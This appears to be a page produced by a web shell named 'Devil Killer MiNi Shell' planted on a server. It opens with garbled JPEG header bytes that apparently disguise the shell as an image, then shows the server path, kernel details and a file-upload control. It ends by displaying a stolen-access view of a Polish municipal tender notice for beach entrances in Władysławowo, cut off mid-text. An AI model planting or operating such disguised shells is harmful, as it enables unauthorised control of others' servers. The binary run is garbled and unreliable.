JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220816/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220816/0030660201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa wejść na plażę nr 1-7, 9 we Władysławowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Władysławowo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191675416</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Gen. J. Hallera 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Władysławowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 586745436</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 586745436</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@wladyslawowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://wladyslawowo.ezamawiajacy.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa wejść na plażę nr 1-7, 9 we Władysławowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f0a51a35-1d59-11ed-acbd-46d0480cd9c4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00306602</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00038000/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Budowa wejścia na plażę nr 1-7, 9 we Władysławowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://wladyslawowo.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://wladyslawowo.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o<br/>udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między<br/>Zamawiającym a wykonawcą oraz innych dokumentów zamówienia bezpośrednio związanych z postępowaniem o udzielenie<br/>zamówienia, z uwzględnieniem wyjątków określonych w ustawie p.z.p., odbywa się przy użyciu środków komunikacji elektronicznej.<br/>Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002r.<br/>o świadczeniu usług drogą elektroniczną (Dz. U. z 2020r., poz. 344 ze zm.). W przedmiotowym postępowaniu Zamawiający<br/>dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji:<br/>elektronicznie za pośrednictwem Platformy znajdującej się pod adresem: https://wladyslawowo.ezamawiajacy.pl w zakładce<br/>„Korespondencja” lub na adres e-mail: zamowienia@wladyslawowo.pl<br/>Zamawiający określa dopuszczalny format podpisu elektronicznego, jako:<br/>• dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,<br/>• dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W związku<br/>z tym Wykonawca będzie zobowiązany załączyć prócz podpisanego dokumentu oddzielny plik z podpisem.<br/>Zamawiający, zgodnie z art. 67 p.z.p., określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie<br/>Zakupowej tj.:<br/>• stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>• komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>• zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer<br/>minimalnie wersja 10.0;<br/>• włączona obsługa JavaScript;<br/>• zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp,<br/>doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar,<br/>gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>Ofertę składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest GMINA WŁADYSŁAWOWO;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail:<br/>iod@wladyslawowo.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji.<br/>4) odbiorcami Pani/Pana danych osobowych będą:<br/>• upoważnieni pracownicy Gminy Władysławowo oraz spółka Otwarty Rynek Elektroniczny S.A. siedzibą w Warszawie (02-672) przy<br/>ul. Domaniewskiej 49, wpisaną do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego, prowadzonego przez Sąd Rejonowy<br/>dla m.st. Warszawy w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS: 0000041441,<br/>REGON: 017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na której Gmina Władysławowo prowadzi<br/>postępowania o udzielenie zamówienia publicznego, działającą pod adresem: https://wladyslawowo.ezamawiajacy.pl<br/>• osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy P.Z.P.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.18.RIiGK.22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 3871524,56 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych pn. &#34;Budowa wejść na plażę nr 1 – 7, 9 we Władysławowie&#34;, w<br/>zakresie budowy nawierzchni, przyłączy i instalacji zewnętrznych (wodociągowej, kanalizacji sanitarnej i elektrycznej), małej<br/>architektury i czterech toalet publicznych prefabrykowanych. Szczegółowy zakres robót określają: Opis Przedmiotu<br/>Zamówienia (załącznik A) oraz Projekt Budowlany, Projekt Wykonawczy, Specyfikacja Techniczna Wykonania i Odbioru<br/>Robót Budowlanych, Przedmiar Robót. Uwaga: wielkości podane w przedmiarze robót należy traktować orientacyjnie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233253-7 - Roboty w zakresie nawierzchni dróg dla pieszych</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">250 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Punkty w kryterium &#34;cena&#34;= cena najniższa brutto*/cena oferty ocenianej brutto x 100 pkt x 60%<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>2. Punkty przyznawane za kryterium „okres udzielonej gwarancji na wykonane roboty budowlane” będą liczone wg następującego<br/>wzoru:<br/>G = ((Go - 36)/24) x 30<br/>gdzie:<br/>G – liczba punktów przyznana danej ofercie w kryterium „okres udzielonej gwarancji na wykonane roboty budowlane”,<br/>Go– gwarancja oferowana przez wykonawcę, dla którego wynik jest obliczany.<br/>Okres gwarancji na całość przedmiotu zamówienia (na wykonane roboty budowlano-montażowe) udzielony ponad 60 miesięcy nie<br/>będzie dodatkowo punktowany, a do wzoru zostanie podstawiony jako 60 miesięczny, natomiast za zaoferowanie wymaganego<br/>minimalnego 36 miesięcznego okresu gwarancji Wykonawca otrzyma 0 pkt.<br/>Jeśli Wykonawca w formularzu ofertowym nie określił okresu gwarancji Zamawiający uzna, że Wykonawca deklaruje 36. miesięczny<br/>okres gwarancji, a w kryterium „Okres udzielonej gwarancji na roboty budowlano-montażowe” Wykonawca otrzyma 0 pkt.<br/>3. Ocena w tym kryterium będzie dokonana w następujący sposób:<br/>Czas reakcji – 14 dni = 0 pkt<br/>Czas reakcji – 7 dni = 5 pkt<br/>Czas reakcji – 3 dni = 10 pkt<br/>Jeśli Wykonawca w formularzu ofertowym nie określił czasu reakcji Zamawiający uzna, że Wykonawca określa czas reakcji na 14<br/>dni roboczych, a w kryterium „czas reakcji” Wykonawca otrzyma 0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja na wykonane roboty budowlano-montażowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na zgłoszenie wystąpienia wady w czasie udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> WARUNEK 1. Wykonawca spełni warunek, jeżeli wykaże, że:<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w<br/>tym okresie, licząc wstecz od dnia upływu terminu składania ofert, wykonał w sposób należyty oraz zgodnie z zasadami<br/>sztuki budowlanej co najmniej jedno zadanie polegające na wykonaniu robót budowlanych w zakresie budowy i/lub<br/>przebudowy i/lub remontu drogi i/lub parkingu i/lub ciągu pieszego i/lub chodników i/lub placu rekreacyjnego o nawierzchni<br/>utwardzonej oraz budową co najmniej jednej toalety publicznej prefabrykowanej wraz z wykonaniem robót branży<br/>elektrycznej i sanitarnej w zakresie budowy sieci i/lub przyłącza: kanalizacji sanitarnej i/lub wodociągowej i/lub elektrycznej,<br/>o łącznej wartości robót nie mniejszej niż<br/>150 000,00 zł brutto (słownie: sto pięćdziesiąt tysięcy złotych 00/100).<br/>Uwaga: WARUNEK 1a) jest niepodzielny w przypadku składania oferty przez podmioty wspólnie ubiegające się o udzielenie<br/>zamówienia oraz w przypadku powoływania się na zasoby innego podmiotu. Oznacza to, że tylko jeden z podmiotów<br/>wspólnie ubiegających się o udzielenie zamówienia oraz tylko jeden z podmiotów, który udostępnia swoje zasoby - musi<br/>spełniać łącznie wymagania określone w WARUNKU 1a).<br/>lub<br/>b) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w<br/>tym okresie, licząc wstecz od dnia upływu terminu składania ofert, wykonał:<br/>- w sposób należyty oraz zgodnie z zasadami sztuki budowlanej co najmniej jedno zadanie polegające na wykonaniu robót<br/>budowlanych w zakresie budowy i/lub przebudowy i/lub remontu drogi i/lub parkingu i/lub ciągu pieszego i/lub chodników<br/>i/lub placu rekreacyjnego o nawierzchni utwardzonej, o wartości nie mniejszej niż 100 000,00 zł brutto (słownie: sto tysięcy<br/>złotych 00/100);<br/>oraz<br/>- w sposób należyty oraz zgodnie z zasadami sztuki budowlanej co najmniej jedno zadanie polegające na wykonaniu robót<br/>budowlanych w zakresie budowy co najmniej jednej toalety publicznej prefabrykowanej wraz z wykonaniem robót branży<br/>elektrycznej i sanitarnej w zakresie budowy sieci i/lub przyłącza: kanalizacji sanitarnej i/lub wodociągowej i/lub elektrycznej,<br/>o łącznej wartości robót nie mniejszej niż 50 000,00 zł brutto (słownie: pięćdziesiąt tysięcy złotych 00/100).<br/>Uwaga: WARUNEK 1b) jest podzielny w przypadku składania oferty przez podmioty wspólnie ubiegające się o udzielenie<br/>zamówienia oraz w przypadku powoływania się na zasoby innego podmiotu. Oznacza to, że każdy z wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia oraz każdy z podmiotów, który udostępnia swoje zasoby – może spełniać<br/>oddzielnie poszczególne warunki, o których mowa w WARUNKU 1b) tiret pierwsze i drugie.<br/>Uwaga: W przypadku gdy jakakolwiek wartość dotycząca powyższych warunków wyrażona będzie w walucie obcej,<br/>Zamawiający przeliczy tę wartość w oparciu o średni kurs walut Narodowego Banku Polskiego (dalej: NBP) dla danej waluty<br/>z dnia, w którym nastąpi publikacja przedmiotowego postępowania. Jeżeli w tym dniu nie będzie opublikowany średni kurs<br/>NBP, Zamawiający przyjmie średni kurs z ostatniego dnia przed dniem publikacji.<br/>WARUNEK 2. Wykonawca spełni warunek, jeżeli skieruje do realizacji zamówienia osoby posiadające niżej wskazane<br/>uprawienia:<br/>a) KIEROWNIK BUDOWY - posiadający uprawnienia budowlane do kierowania robotami bez ograniczeń w specjalności<br/>inżynieryjnej drogowej.<br/>b) KIEROWNIK ROBÓT - posiadający uprawnienia budowlane do kierowania robotami bez ograniczeń w specjalności<br/>konstrukcyjno-budowlanej;<br/>c) KIEROWNIK ROBÓT - posiadający uprawnienia budowlane do kierowania robotami bez ograniczeń w specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;<br/>d) KIEROWNIK ROBÓT - posiadający uprawnienia budowlane do kierowania robotami bez ograniczeń w specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych branży elektrycznej.<br/>Uwaga: WARUNEK 2) jest podzielny w przypadku składania oferty przez podmioty wspólnie ubiegające się o udzielenie<br/>zamówienia oraz w przypadku powoływania się na zasoby innego podmiotu. Oznacza to, że każdy z wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia oraz każdy z podmiotów, który udostępnia swoje zasoby – może spełniać<br/>oddzielnie poszczególne warunki, o których mowa w WARUNKU 2) litera a) do d).<br/>Uwaga. Zamawiający dopuszcza łączne spełnienie przez 1 (jedną) osobę funkcji kierownika budowy z funkcją kierownika<br/>robót w jednej lub kilku z wymienionych branż budowlanych lub funkcji kierownika robót w więcej niż jednej branży.<br/>Zamawiający zaakceptuje uprawnienia budowlane w rozumieniu Ustawy z dnia 7 lipca 1994r. Prawo Budowlane oraz<br/>Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014r., w sprawie samodzielnych funkcji technicznych<br/>w budownictwie, a także uprawnienia budowlane odpowiadające uprawnieniom wymaganym przez Zamawiającego, które<br/>zostały wydane na podstawie wcześniej wydanych przepisów oraz zagraniczne uprawnienia uznane w zakresie i na<br/>zasadach opisanych w ustawie z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich Unii Europejskiej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">WYKAZ ROBÓT BUDOWLANYCH wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności<br/>jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty<br/>budowlane te zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze<br/>wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Uwaga! Jeżeli wykonawca powołuje się na<br/>doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami, wykaz, o którym mowa w zdaniu 1,<br/>dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył;<br/>• WYKAZ OSÓB, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> WYKAZ ROZWIĄZAŃ RÓWNOWAŻNYCH– jeżeli Wykonawca przewiduje ich zastosowanie (w przypadku, o którym mowa<br/>w Rozdziale IV ust. 7 SWZ) oraz dokumenty na potwierdzenie równoważności zastosowanych rozwiązań (jeżeli są<br/>konieczne do wykazania równoważności). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jeżeli złożony wykaz rozwiązań równoważnych będzie niekompletny, Zamawiający wezwie Wykonawcę do 